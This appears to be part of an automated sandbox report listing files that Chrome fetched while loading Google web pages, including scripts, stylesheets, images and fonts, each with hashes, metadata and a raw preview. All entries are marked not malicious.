                                                                                                                                                                                                                                                                                          SHA1:07A5E1E5A27C3010C6CF674B16B8A842631E34EB
                                                                                                                                                                                                                                                                                          SHA-256:099445A35EDBBDE5C92A42C0C06012C0F85D8499F52B138C12FA22696F732429
                                                                                                                                                                                                                                                                                          SHA-512:18EC129ACB13642BAA3149AA60982A2AC2334B4892A52691A4CEFFE6E6287F64CB5BD1ACBE8018372732623DD0011A09AFB636DBDF1E8DFA5E1369022E9353D5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/5Ss99t85.min.js
                                                                                                                                                                                                                                                                                          Preview:import{T as h}from"./ycaG4YXp.min.js";/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const a={ATTRIBUTE:1,CHILD:2,PROPERTY:3,BOOLEAN_ATTRIBUTE:4,EVENT:5,ELEMENT:6},d=e=>(...t)=>({_$litDirective$:e,values:t});class l{constructor(t){}get _$AU(){return this._$AM._$AU}_$AT(t,s,r){this._$Ct=t,this._$AM=s,this._$Ci=r}_$AS(t,s){return this.update(t,s)}update(t,s){return this.render(...s)}}/**. * @license. * Copyright 2018 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const u=d(class extends l{constructor(e){var t;if(super(e),e.type!==a.ATTRIBUTE||e.name!=="class"||((t=e.strings)===null||t===void 0?void 0:t.length)>2)throw Error("`classMap()` can only be used in the `class` attribute and must be the only part in the attribute.")}render(e){return" "+Object.keys(e).filter(t=>e[t]).join(" ")+" "}update(e,[t]){var s,r;if(this.it===void 0){this.it=new Set,e.strings!==void 0&&(this.nt=new Set(e.strings.join(" ").split(/\s/).filter(i=>i!=="")));for(c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):833721
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.096311180916947
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:Ho8WAFf3SEWUtgzlXFX8w0WNTiQewvSjeCplsSTN6hf:Ho8WAFMlXFX8w0W5YhjlsqN8
                                                                                                                                                                                                                                                                                          MD5:ACCB16B3843D5967954432AB5872A643
                                                                                                                                                                                                                                                                                          SHA1:4C9DD9CB5EA67D3B12B13A8DEF3859BCEA6EB4A8
                                                                                                                                                                                                                                                                                          SHA-256:FA81ACBB52BF464549FE45EEA7F3FA29E6E0B04B864125B4F006072F32DAD4D4
                                                                                                                                                                                                                                                                                          SHA-512:73B2AA3445BE96AEB1CA9430A1B72874AFF3CBEA9E0B7F747F45505237DE844A81B524B883BC91D3E24694D6B7E82D7F99A3AD97A7BC59BFFFB12126C4AB1E47
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://smallbusiness.withgoogle.com/static/css/index.min.css?cache=4c9dd9c
                                                                                                                                                                                                                                                                                          Preview:@charset "UTF-8";.glue-component-not-ready{visibility:hidden}.glue-component-ready{visibility:visible}.google .glue-component-not-ready,.no-js .glue-component-not-ready{visibility:visible}.h-google-red-50{color:#fbe9e7}.h-bg-google-red-50{background-color:#fbe9e7}.h-google-red-100{color:#f4c7c3}.h-bg-google-red-100{background-color:#f4c7c3}.h-google-red-200{color:#eda29b}.h-bg-google-red-200{background-color:#eda29b}.h-google-red-300{color:#e67c73}.h-bg-google-red-300{background-color:#e67c73}.h-google-red-400{color:#e06055}.h-bg-google-red-400{background-color:#e06055}.h-google-red-500{color:#db4437}.h-bg-google-red-500{background-color:#db4437}.h-google-red-600{color:#d23f31}.h-bg-google-red-600{background-color:#d23f31}.h-google-red-700{color:#c53929}.h-bg-google-red-700{background-color:#c53929}.h-google-red-800{color:#b93221}.h-bg-google-red-800{background-color:#b93221}.h-google-red-900{color:#a52714}.h-bg-google-red-900{background-color:#a52714}.h-pink-50{color:#fce4ec}.h-bg-pin
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):106628
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.310419346601203
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:O/Y1PIxVCq6vzyTalaidLkOZwSEK6P0g5o6:AWIxVr6ffdAOZ2dPVb
                                                                                                                                                                                                                                                                                          MD5:787C46F216EE2617B2A2F2F55003B125
                                                                                                                                                                                                                                                                                          SHA1:E9B42DC688870FBAAA3FE0BC7A692C623D3528AC
                                                                                                                                                                                                                                                                                          SHA-256:D9D936C7F66D7569EFA7EBC0237B8E1CE4171DEFB0E6758067BBA07C3AABA1D5
                                                                                                                                                                                                                                                                                          SHA-512:9D42B29F53F272183E3E4AFF067B66DDB4C466329308AE1D1021135ED930825C96E331A252C94BF5F7BF8157A2F0968577B3438663C7C6BF6461BF05CCEF933B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF|...WEBPVP8Lo.../....u!...B.m.?...""9.l.*9..rlm{..J.YCf*r..c/.........].sf..w...s$.........C.....d......G./.(...Y.\...Y.0s.Gnm[...'.....C..2....+6..G.1v0.....(..vlo..<...`.C.3..eh.m.m......V.7..m......7...?...9....zO..@...m.....9....s..8..U;....n.4....T.Y.u......\k..`..k....y..y...?2..my.I... .l............HV.Hf..y...<.].e.$.........4.........-.a`|j...........Q{..../u.[..m.-.d.K !.Y.Z.[.-o.]...b{.:(. e...............m..e.,oAef...[....$YA.W.#...*....0..6M...~.....EF.E.}.(..q..tm......j...U..e..B-B.....k*"j..M<...m[..>Ah...Y..v.s......Hl8|...I.-..b..c..0....m.s......N4J..PQ.........U."h..7..h.g..F.....2.....x.m[.$I..}........l.#T.*......q$cR..W...<I.H.l[.O......Y,..0.(r..yM#[.....Z.T."...|I.dp.....G.C.../..m.mK.U.X{.s_@.Yr!Af.2..%..cf.i...B. ."..9{...m.kk..>..-^I18.A.}.:.8.`>..Q..X.U......<..Mg..[o.m...Q..[:.Yvvw..d.Sv.Df.T.(dD.V.*Dn..`.K.X.$F...J.#.k..).`..X.....j.Q.........t..1K..)..a...1K_.w).Ir.6(.Bh.\j+...................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4463
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.504816863583782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oFohgV/tAnZIp2dXhSD1GfXTTW6is29ul08ixYCdN+45K40f15:oFoh+anqp250DofR2gl05YCdj5Xk5
                                                                                                                                                                                                                                                                                          MD5:32B950D96A70990F4875792FA123D4B1
                                                                                                                                                                                                                                                                                          SHA1:1ADBA6313FF312C2D529497D52908A14132243C6
                                                                                                                                                                                                                                                                                          SHA-256:2C6878E013D4BD6970C0B5056E192207A63C1FB3BDBD80B0122BE6ADA4B42CA7
                                                                                                                                                                                                                                                                                          SHA-512:089B9176D0ECF7C9CDEF9A72077A73516187DB556C51B4A02353633614EFEBAD6B2A85E2FE2E38FE171926798773A6AEF1289D4DA380A52E2C30AF38153594D1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR....................pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...M.$.Y..zz6Q.......M@...R,....A.mq..ls......8p......H.6...c.EH........"G...9..3.E.x...g........V..v=......]!..................................................................................t......Y.Z8_..#...)....h{2.<...v....O._.....A.+<(~.wfy.f.............S..}6.....I...C..g..,....g.A...%;...~.O......0 .....n2.*d..y....e..._.oe..[..o?..@...~..&.!.;...8......1{=.\\..X/...C....M..,.}.6y.....0j...l.T.&.....r<....^.=..P......B.l.+.e....{..'7......?.O.........|)..A.e/M'G/.i+...X.._u0)&...........:..._;...........;.....d+..A......~+..T6.......j.B....x.....Z..............=V|.v...,..!...W....{}....n..n.Yh-..Z.@q.o../Q....9.`.].....{......k}.._...66f.....$t.{..zjs....._.:W....._....$.W6.Ng...r.....u4..>ze...N7......{=..$..3... Y.......1...HB..CK>.....$..../IB..CL>.................W..FJ...&....jOO.;l......}&....IB..%.....r.7.[......G.z.A....2.,v~2..u..A........
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 8704, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8704
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973978900924564
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:e0fgRavqHJmIO6zSY5nrMMqqQIRWwRb8mGCn3NYTNzZhGtByi:e0fgRJpmirJRjbH9gJZonyi
                                                                                                                                                                                                                                                                                          MD5:95B5960B3B32B24C83C2682856358954
                                                                                                                                                                                                                                                                                          SHA1:47C054D8E82DF55DD36101F1C31DD943E6BC1653
                                                                                                                                                                                                                                                                                          SHA-256:C59688786DB8B971E0B13B388717C071D361B18175CFF22B3307BC422A4F2597
                                                                                                                                                                                                                                                                                          SHA-512:08AC35D0026F0DE7D4A1CAD96834D5EB5E6AA0468CEAA131CB89C0A619017B4FCD10C60522C27E32835ACC771ABAEB0DA4747A0E92C9F8C214942CA4A646FA40
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjEUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......".......C...!..........................|.....,?HVAR.\.`?STAT..'...j/<....H.L..Z.0...6.$..0. ..B..$...D=... .q.d..K....6F......e8)..(uU&EM.V...U.T..6..*..;...uD..}..'..7n..L...'..J..n..5..q6v.....A3pq."...0..n.y0.$.h..J...!.,..g.|...]....v.=`F....Lp....$.?......e..I.B.Ue+L5.0W..q[..]$W...&.#....L..+......*..2~t..\.,......K..../.GX...B7M.!...O....h(..tYy_@z../........(!....d.A...'...{.......O\.Z......,..>....%.V5.......}.t.2....".5.Vp.vQ.[.{).E....|.k....<.`...^...0.g.=p....7k2..x:....\.<t.23Q......f.........0...?.!..e..T.$..R.&Pi<.......P..Y.RQ..IA..H&S.........}40h.X.,.[.ZvtT1..r...9.3kz=#......T.......".l.R....,.Y..g....._....Z...U...,...9I.v].! @..`x.../...DD.A.1....)R.......%J..*.U..5j....M..-Z..:.=...(..I.6mo...CV....8....mH..N.........F..."..n..l\U.QsP,......j.$.7[=.X...&..^.ct .oJ.3..C{.......@.W.W.\....`.....4.#...Qt....;7H..2....h.;...{d1..=..R..d.A,.WW....|P5<h......XZ..5..N. C.%q.........>\...^w...v..A..YN..._.G.G.~..h.G..&.X...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18492, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18492
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.988005025098439
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:jHq3alnVfBJBuMlPGCh9NBRLS64LRb0v5waXf0BFY0/rJ8Zw4bzUQb:jHqKf5JMOPdzNPLS64laxsFY0t8XcM
                                                                                                                                                                                                                                                                                          MD5:7FDA4C62C1BDEAE7A08E6FD438104BAC
                                                                                                                                                                                                                                                                                          SHA1:B1F626E78F5F6D7BE993303A49EB81F0FA4CE57C
                                                                                                                                                                                                                                                                                          SHA-256:4DBD328E347E890A801D51F9A5F8D38A3EFD51EC34C0AA22CC83D0A95D6D9D71
                                                                                                                                                                                                                                                                                          SHA-512:C4A36A3C1FF23023533DFF103A108844B7CFE4E793ABA0B1B5576431E77DD6E9EDF29FAD68132577AD6AD55CA7A011A38723DA2FA15D9071D2C6BA4E02D1DADC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......H<..........G..............................Z..|.`..J.X..<.....P..N..Z...x.6.$..0. ..|. ..:...%l.F.......T.mZ..V.n!.53.l.@..N....CD.!f......I.(;..Cw.2L..@....M....(.H*].......1..I&..tE.e....D...}y..6D.h.Z..$y.J.X._....J2 .*(.....=M..+Hd*.Y.6.f.J.z..:.........#.#...3..;.<..q./.,g.tK.Y.Ne.?......1.b.......S.".~..|Q.9.1Q.Y.^....MkF......;v..g(.(S...Z.>...l.XW.Z....-Q.h..MR8$..W(..Wh.0....X..;]3...:..\/..L...L.U...6".h?K.....A.....(2z.uRTn...GaJ......+..4..d...I.[!..Ua..x..4.,@..t....3.e..J._'..R.j.p.t...`.4.......aI,.....W..9V..K..c..... g...:.........'..6.O.0+..;Q..&..e..=..sg......Eg.2.R.M..{{w.{{'4.L.O2.L$) ;..`....PeW..O..iS..e..S.l... .....R.R.+.!.uLUE~...C.JN..J.r...@..g..:.\..;..s.n.s........sq4... ;..N.`.H<T.....p.#2.e....H..T...........1....^......L.....R...R.1.!............E..m_Z~....z..L..j....".q~..Pg!X}1.q.!.n......@.d...._5=..*x.......[.y.#$Q.d.........j...1n.....&...-(N..P\5<.f.qB..|.i...q<.'..C.A...\.i.x.9........1.>....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 391 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):94168
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.990430094990128
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:Jj0BfmMD+HChd/PfDS4t7D+wutCYAFH1Ndas87t1415+9DKnagiX6zz1io3de8oF:0jYyXfDvtYCYAd1j670X+Unn9XB3w8o
                                                                                                                                                                                                                                                                                          MD5:B60555632ABAFCFEE17726F9937E3A65
                                                                                                                                                                                                                                                                                          SHA1:FC4F3BCF9742530B33183C5F6C1C152E9972DD4A
                                                                                                                                                                                                                                                                                          SHA-256:56AC594DD1C8FF75B249A4ED7F82B87CA4C6EF6CFFBF7D7710A8D22AA37709BB
                                                                                                                                                                                                                                                                                          SHA-512:57028D3C54A4AFFB1F2D8F662E41E6DD0ED9EE0B55554B97967843E61BD229CC243D684F19D42AA4567B43F3BF0B676C8BE09EDFD3489AE132EDDA938D0B0734
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/NksFVpnLFiAE4YKEh9n84ebvfznogwh0AyAUDpmpLqpBP7h791LS9RcIzWpE8XfsiR0NJiHomxV8FyVO2ccMF2VzB_L3omeUWuHu9d3LGJ4Ww6JKviev
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............iC......sBIT....|.d... .IDATx..y.%Yz......{..].[UWuW.L.L.t.tK3...0.....6.e.Fl..O a...`.d.d...e@...a B`.HB.....k..Z_U....<..8..<K.{_.../.{..Y..7....}g.....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...O.........mx.b......-..p'.p....q.P/Mv.Q.Y.3A..Bb.....`.....`.R. A.(@..@ %B@.A.@J...$.H)!.N..! ....0.P... X..,J.E).R......pq#.........?......}}......P...^K..O'I..a..R>...^.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x395, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):29309
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.953051353001186
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:xteKqQihRMizDN+aRyNXC8xOMVpnddiuOrz:xte5RM7PfBK
                                                                                                                                                                                                                                                                                          MD5:6A3AA3B64DC6D5B7D8C44BDCB0018753
                                                                                                                                                                                                                                                                                          SHA1:45DB7AA420AD87D0A2CACDAF0F42290F658C8E3B
                                                                                                                                                                                                                                                                                          SHA-256:19F91128AF78185C80A6D17DC483785402992D2C666FF6CCCA04DB8530308160
                                                                                                                                                                                                                                                                                          SHA-512:7A344EB2EF7915758951AA2855DB27DBA68151703A166F2B4857591F400110DF05621E4606BBAA81907CD48944FDF18D92483E75AD36FC1E0BD02CABDC432623
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/cc/0a/1c4ce65a437390fc306819b92c59/sustainability-hero-width-1600-format-webp.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF...........................................................................................................................................................".........................................e..........................!1...2AQRaq.."......5BSTUbru.............#346s.....%Ct..&.$c....'DEVd....................................C.........................!1Q..ARaq......2S...."3r.#4B....b$c..Cs.............?........" ...""...." ...""...." ...""...." ...""...." ...""...." ...""..../...=E@.....DD....D@...DD....D@...DD....D@...DD....D@...DD....D@.....}.6.F.h.$U..7..c...s...W..DU..3.....U.. .P.W...~...5.....FP....!..u.;......h....T.@...r.R...p..tk..*.%.D[%.k.a:.*.E.#!n.GrOQ^o.....u.,A..\%..l....2}.....xv-.C.(-.d.)....<+.jw7X..c....D@...DD....D@...DD....D@.}..:.>..n...{.......q.a......a.o9.=.$*Qe>..'I.G...P....t..y{...TQ...".X..}"...Ta..ts.^..Sg.su.s.u........].nl%.Wk...e,...8u}..n,.....<..}..<..$....@..2.e+....^...S@.z..[%.......=......\./)..c......~..#{.qp..Q.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1513444
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.981642963077748
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:uD6dq/GsWLIdb2Ff/4QQN9hGXWvdnqAin91+Fyp5gVQ6+HLZKC/6yUcqFx1XZzNi:u8q/R4IF2FIQQN9MmvdnqAiniPQ6YL4I
                                                                                                                                                                                                                                                                                          MD5:8F54AFD445F893DAD45FECB02F7F28E1
                                                                                                                                                                                                                                                                                          SHA1:45545996151DBD7AF64ACCE45601C8BD5F381E82
                                                                                                                                                                                                                                                                                          SHA-256:9BF4FF9517B3EDE5CF09EBFC3B81D9DC51F60DC506607878457226150AF3E96D
                                                                                                                                                                                                                                                                                          SHA-512:2B140330BA94B6693B47640A1480623F8A3E001B4C9D97E76AD3BF24E130E97FCB96055CB15BB1B97691FAFD61867216A7E76DA004386A96FD2649DC46943189
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 17:13:43......................................................2022:09:08 17:13:43....)....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 47164, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):47164
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.995177469719953
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:fGdc+bUrQ0CF7AXFIYqoN8lZ3Ow03w4PneYMGpsEYJbGDzBTDDnTtHC95LPOJ1P9:u7Ur2Zs609PdMGpsHbGDFnDTVC95L2J7
                                                                                                                                                                                                                                                                                          MD5:6A5DD1D8BCA1E91AFAAF203D1E9C9EF8
                                                                                                                                                                                                                                                                                          SHA1:00A130D288E0E3E3621C5961DEE8B934FECC2D54
                                                                                                                                                                                                                                                                                          SHA-256:DB88088AB42E35955FB7614597FBDCA3C25600ED0556FEBB44494069DF605AEF
                                                                                                                                                                                                                                                                                          SHA-512:4C14D0F0537FD23BB8A881CDD76003A5E0AEB9BBA19A9F404B66AFD21FFE3238313B3C77332F3DB1C7223DAE6C05B76BE95BB3E79BDF617A5FA8B023E49335B6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjMUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......<.......(..............................h..X...h?HVAR...`?STAT..'...L/<.....T..7..R.0..F.6.$.. . ..B..#..[^.q...6...Q........O.".n/`.hYt...M.c[61..D..T......d....U.....j.DN*9.i.,..X.....Q. .f"...R2h.DqDsJ......,8....+F...(H.....Y....in.].&...Q....=...v....h....*..]>.3n#..$...KO.11.o.5[9f.b.j~Se..J..Ul.....2......VJ9.$..'m...Cn.../....dH.B..W..S.w.HIP8Vw.r.Z..........v{p.&.!..: ....h#...9#...g..}*.d:iG.......dx.O{......$"...4".. .T5K.TS.4..TUUU.45533gf.235.ff.f.f.L...L.....33gN.......A(..T....G?..|>...>..ZZ.x.E.....93ec0g..L}`..N.1..yk".*<".....o'i...8..I$.. M$..:-1r.[."..@.n\.U..:e.)u.,?-.r....]I....A...Su....%....G.I...K.J...&.M$.m...-..n$..W...$."..3e...+.n......^..h;..E..A.:.......m..U......3..Y..y0..C....... j.F.....7\-I.u..t.":=Q...KV..e....QF..y..5. }...b.-.F}r..r&......v.......E....j.C.B.0...j...=......s.....P...v.{...lc....(...q...........yo.6.;/B\)k.1..#sg...a.......++..u...NU.....:.....D...]m..(B..@"x..,....).6.=.H@....T}.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15844, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15844
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.986244297125621
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:0R6Km4yijh4fD2bcmxSXvr3XlQS09DiSuy5:lKHyUKv7qS0YSt
                                                                                                                                                                                                                                                                                          MD5:EC17B8A4B615BCFD221D30BA412F3B16
                                                                                                                                                                                                                                                                                          SHA1:D72C8A5B499A2FA7653746C03EB3223F0EAF88EA
                                                                                                                                                                                                                                                                                          SHA-256:7C666230EF68413B148AA5F83714DB3BC80C28466962F506952C7B2E516D6403
                                                                                                                                                                                                                                                                                          SHA-512:42B6F29B139C5A63B350B822557C9D1DBCFFDB8830E0AEF328B01CD8DF720C1E0ADB625B8AA4833B074E1ABF85C1657547BBF2DBFA176FA83FD86333A3391DC3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......=...........=r................................l?HVAR.#.`?STAT..'...H/<....$....j.0.".6.$..P. ..B.......z..6.xv;x.'..g.bp.d........@.......J..0.L......V.<.*u.pA.x.c...g2..8....T$.>.<..F~.u.&. .....X..au.....A.....OX.X..].V.n..$+4[.qqe.,.A....-~....e?......I...<..F.$'.......E.....O....PL.. .4..."JU.........xq.I.........At.I..t]#...N....p.xXB.. Y....7...I".D$........T..tV}.(.J%B.m5.....h..]._.....{z..../..{1.[2.;5l\A*b@"...D.p.n..f.V*.x.......I ...).O.&&..{.{w^./...a.?.@e.....<.Y./[.bK..b2..^...0.........o.;.9`'92..$I.......B.c..Jv..{....P..L.D./..23.f..+7..+..p,?.\o...T..0.J...............z..Py..[........4k.o.)D..r...*U..".4.q....q!.I....Q6.W.,...j^.?>`.P....{yh58..QN...........$%...............!..%.R.r.....l(...y9.W:.*..M.L}........S...4......Z.\|......jSZE..LX.$........l...F,.!.(.1..y...M&...dk..(.D....R.*....E....7...Y0.qv.t........Z.i.u.l."..g!g#.(.dl....s..iau.........#,..a.C.._...!=>k.J.L..pf.|..../.... .....K.....9P
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1766x1720, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):175132
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.998934116147253
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:3072:0oJ5HBklRgqDdw3RnqT4GQHdDm7TSw7NRfWK36v7taTb6ssUr4xrMklx73:0oJ5H2PDdctqT4nHN89Ox5LMklx3
                                                                                                                                                                                                                                                                                          MD5:7A01ED14A44CE07935FFC1C2318DD96A
                                                                                                                                                                                                                                                                                          SHA1:BB96B6D37E2D73E48CB92E69555B08A8F76ADF7B
                                                                                                                                                                                                                                                                                          SHA-256:BDB8CA6307E36E8506DAB613589E31006E00A5906E0CC9D2F1A043D118D9214F
                                                                                                                                                                                                                                                                                          SHA-512:FFAC2C6844122D3E3AF1A71AA2A9F7F8C994993BE66EBF7FA8EB8E4E5E40F8AFE4069D92EAFF04127A0AB0C128CCB796775730CE768E6CAB6EB05C992DE3602E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/23/9f/a8f450eb4e31b0a4aa7c88b99e44/carbon.webp
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 ....05...*....>m4.F.#).,2J10..gKr.^..76....{.]./.{..e.Gvr...7................0./........l..?M...'..Ev=j9....}t?....y.....d?.{#.5........u;..u.........~.q._...~......3..>...g.........../..?......O.......|_.../O?..,.?.zh.....oa.............z......w?......H.k....Z...I..1..:".......v..6.o.q#....3j....U.dM0U.s.:".3x.DX.o.....wx.X....dM0U.s.:".3x.>..5..V..._..btE.f.N....)..1..:".3x.DX.mSub..~]0....]}o.~......e...^Xcw...K._.z..:Z[..]..'w.;.,y.........J.b.!.h....H$.....8.....%.i....I/..'G.>.p..'e...!.D..%..MGt'.}.....h..@4..)*C./..D...H....=\...%.J.!.).H...Ouun.-.Y........U..%..j.a&....D.uD.=FR.\...~.<...[u....L..:.o...of.z...;0 f.&h.HTdI.U~5tRB%=..U..f..<....DU..........Y...\9i.HAW2.5q&........4K!...V........:l4l+.S.4..9...O......_.yt..O.2*v../.P .."D..'0.......].%..>..]X........[&.0.]))E.._.?.(..X. w.56.o.o<.C.].mQ..o....0.+.....D>.6...~....R..M.{..a.A|D"._x.......1.M.....g...f..z.(.t..Bj....?Yr.+@=B..%{..hq.'..a....0.3..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
